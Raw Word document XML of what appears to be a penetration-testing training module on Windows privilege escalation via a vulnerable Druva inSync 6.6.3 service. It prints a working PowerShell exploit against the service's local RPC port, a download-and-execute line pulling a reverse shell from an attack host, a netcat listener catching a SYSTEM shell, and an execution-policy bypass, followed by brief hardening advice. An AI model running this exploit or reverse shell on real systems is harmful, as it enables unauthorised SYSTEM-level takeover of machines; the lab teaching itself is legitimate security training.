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15A2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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerable Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11218E85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72CC87D6">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F652D4E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We may be able to escalate privileges on well-patched and well-configured systems if users are permitted to install software or vulnerable third-party applications/services are used throughout the organization. It is common to encounter a multitude of different applications and services on Windows workstations during our assessments. Let's look at an instance of a vulnerable service that we could come across in a real-world environment. Some services/applications may allow us to escalate to SYSTEM. In contrast, others could cause a denial-of-service condition or allow access to sensitive data such as configuration files containing passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7787E186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2B8422A4">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3C9DE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Enumerating Installed Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C40A9C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As covered previously, let's start by enumerating installed applications to get a lay of the land.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D7EF04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Enumerating Installed Programs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F95F52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C:\htb&gt; wmic product </w:t>
      </w:r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get</w:t>
      </w:r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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCA91B8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0F45443F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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F57D6DD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Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DABC0C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Update for Windows 10 for x64-based Systems (KB4023057)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6CD13B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Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A3991B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VMware Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29355E07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Druva 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inSync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6.6.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64F560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Microsoft Update Health Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2664FA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Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29910</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFCA375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Update for Windows 10 for x64-based Systems (KB4480730)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17BB23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Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3272FC51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The output looks mostly standard for a Windows 10 workstation. However, the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Druva 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inSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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application stands out. A quick Google search shows that version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6.6.3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vulnerable to a command injection attack via an exposed RPC service. We may be able to use </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="004B68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this</w:t>
        </w:r>
      </w:hyperlink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exploit PoC to escalate our privileges. From this </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="004B68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blog post</w:t>
        </w:r>
      </w:hyperlink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which details the initial discovery of the flaw, we can see that Druva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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inSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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is an application used for “Integrated backup, eDiscovery, and compliance monitoring,” and the client application runs a service in the context of the powerful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NT AUTHORITY\SYSTEM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account. Escalation is possible by interacting with a service running locally on port 6064.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004677A9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Enumerating Local Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6945C5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Let's do some further enumeration to confirm that the service is running as expected. A quick look with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netstat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shows a service running locally on port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6064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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A652F6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Enumerating Local Ports </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC978AA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C:\htb&gt; netstat -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ano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| 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findstr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6064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5226EEAB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3A9EF8F4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3324</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC17284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TCP    127.0.0.1:6064         127.0.0.1:50274        ESTABLISHED     3324</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5335E7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TCP    127.0.0.1:6064         127.0.0.1:50510        TIME_WAIT       0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0247B3D1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TCP    127.0.0.1:6064         127.0.0.1:50511        TIME_WAIT       0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA04B0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TCP    127.0.0.1:50274        127.0.0.1:6064         ESTABLISHED     3860</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48228A6A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Enumerating Process ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7024D102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Next, let's map the process ID (PID)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3324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back to the running process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F732506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Enumerating Process ID </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F603538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PS C:\htb&gt; get-process -Id 3324</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6573E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37ADE4AD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Handles  NPM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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(K)    PM(K)      WS(K)     CPU(s)     Id  SI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="252AA421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-------  ------    -----      -----     ------     --  -- -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE75350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 149      10     1512       6748              3324   0 inSyncCPHwnet64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18740F4A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Enumerating Running Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B3AA9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At this point, we have enough information to determine that the Druva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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inSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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application is indeed installed and running, but we can do one last check using the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Get-Service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cmdlet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8648C1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Enumerating Running Service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1C20B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PS C:\htb&gt; get-service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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| ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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{$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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_.DisplayName</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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-like 'Druva*'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E071A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</w:p>
    <w:p w14:paraId="0C832187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Status   Name               DisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9EA8C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------   ----               -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A97C0AC" w14:textId="77777777" w:rsidR="004B6853" w:rsidRPr="004B6853" w:rsidRDefault="004B6853" w:rsidP="004B6853">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0124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Running  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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inSyncCPHService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  Druva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>inSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B685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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Client Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC748B8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0731B7D6">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DAA90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 xml:space="preserve">Druva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6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inSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B6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 xml:space="preserve"> Windows Client Local Privilege Escalation Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5297D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Druva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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inSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> PowerShell PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D54559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With this information in hand, let's try out the exploit PoC, which is this short PowerShell snippet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D2563A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Code: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7842C250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$ErrorActionPreference = "Stop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34256FB3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B3AEA97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cmd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= "net user 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pwnd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/add"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E465E0D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2C92DF3B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$s = New-Object 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System.Net.Sockets.Socket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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198AB15A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[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System.Net.Sockets.AddressFamily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]::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InterNetwork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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C29824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[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System.Net.Sockets.SocketType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]::Stream,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53A419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   [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System.Net.Sockets.ProtocolType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]::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Tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FCB3936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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025E9633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s.Connect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("127.0.0.1", 6064)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B4E43E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13A4DD78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$header = [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System.Text.Encoding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]::UTF8.GetBytes("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inSync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PHC RPCW[v0002]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0FEE2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rpcType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 xml:space="preserve"> = [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System.Text.Encoding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]::UTF8.GetBytes("$([char]0x0005)`0`0`0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF0275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lastRenderedPageBreak/>
        <w:t>$command = [</w:t>
      </w:r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System.Text.Encoding</w:t>
      </w:r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]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $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cmd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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E086A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$length = [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System.BitConverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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GetBytes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($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command.Length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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B5900B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</w:p>
    <w:p w14:paraId="2763BF0E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s.Send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($header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A53362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s.Send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($</w:t>
      </w:r>
      <w:proofErr w:type="spell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rpcType</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B11264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s.Send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($length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B4D5D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proofErr w:type="gramStart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s.Send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B685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($command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A73A3C2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Modifying PowerShell PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615DFB14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For our purposes, we want to modify the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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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variable to our desired command. We can do many things here, such as adding a local admin user (which is a bit noisy, and we want to avoid modifying things on client systems wherever possible) or sending ourselves a reverse shell. Let's try this with </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="004B68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Invoke-PowerShellTcp.ps1</w:t>
        </w:r>
      </w:hyperlink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. Download the script to our attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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box, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rename it something simple like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shell.ps1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. Open the file, and append the following at the bottom of the script file (changing the IP to match our address and listening port as well):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76118B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Modifying PowerShell PoC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658BF52F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Invoke-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PowerShellTcp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-Reverse -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IPAddress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10.10.14.3 -Port 9443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549F74C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Modify the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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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variable in the Druva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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inSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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exploit PoC script to download our PowerShell reverse shell into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0F5AD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Code: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56FDCA3C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$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cmd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= "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powershell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proofErr w:type="gram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IEX(</w:t>
      </w:r>
      <w:proofErr w:type="gram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New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61443836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Starting a Python Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D5659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Next, start a Python web server in the same directory where our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script.ps1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script resides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135648EF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Starting a Python Web Server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038BFEE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yovecio@htb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[/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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]$</w:t>
      </w:r>
      <w:proofErr w:type="gram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python3 -m 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http.server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8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27F5C3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E" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Catching a SYSTEM Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C0DB0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Finally, start a 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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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listener on the attack box and execute the PoC PowerShell script on the target host (after </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="004B68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SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>modifying the PowerShell execution policy</w:t>
        </w:r>
      </w:hyperlink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with a command such as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Set-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ExecutionPolicy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Bypass -Scope Process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). We will get a reverse shell connection back with </w:t>
      </w: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SYSTEM</w:t>
      </w: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 privileges if all goes to plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75D63A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 xml:space="preserve">Catching a SYSTEM Shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA85F3D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yovecio@htb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[/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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htb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]$</w:t>
      </w:r>
      <w:proofErr w:type="gram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nc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-</w:t>
      </w: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lvnp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9443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A7DC8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0498143D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listening on [any] 9443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D0C93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connect to [10.10.14.3] from (UNKNOWN) [10.129.43.7] </w:t>
      </w:r>
      <w:proofErr w:type="gram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58611</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BE847E1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Windows PowerShell running as user WINLPE-WS01$ on WINLPE-WS01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A72D5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Copyright (C) 2015 Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B42508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67FD5A9A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7D89B6B5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PS C:\WINDOWS\system32&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27334C1F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75FBF93B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spellStart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lastRenderedPageBreak/>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E954092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1EDB0FDC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54FC3733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PS C:\WINDOWS\system32&gt; hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE75EB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p w14:paraId="735EA2C4" w14:textId="77777777" w:rsidR="004B6853" w:rsidRPr="004B6853" w:rsidRDefault="004B6853" w:rsidP="004B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4B6853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>WINLPE-WS01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109736B6" w14:textId="77777777" w:rsidR="004B6853" w:rsidRPr="004B6853" w:rsidRDefault="004B6853" w:rsidP="004B6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pict w14:anchorId="19664072">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AA130" w14:textId="77777777" w:rsidR="004B6853" w:rsidRPr="004B6853" w:rsidRDefault="004B6853" w:rsidP="004B68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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Moving On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA66356" w14:textId="77777777" w:rsidR="004B6853" w:rsidRPr="004B6853" w:rsidRDefault="004B6853" w:rsidP="004B6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</w:pPr>
      <w:r w:rsidRPr="004B6853">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>This example shows just how risky it can be to allow users to install software on their machines and how we should always enumerate installed software if we land on a Windows server or desktop host. Organizations should restrict local administrator rights on end-user machines following the principle of least privilege. Furthermore, an application whitelisting tool can help ensure that only properly vetted software is installed on user workstations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5D9FA" w14:textId="77777777" w:rsidR="00213442" w:rsidRDefault="00213442"/>
    <w:sectPr w:rsidR="0021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8"/>
    <w:rsid w:val="00176CA8"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="004B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3EF45"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{552B5E65-E5F3-44F2-9D13-76DEDE50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B6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B68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53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6853"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-SE" w:eastAsia="en-S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B6853"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B68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853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68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6853"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B6853"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B6853"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004B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tspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-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mratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/492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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-07T14:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-07T14:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>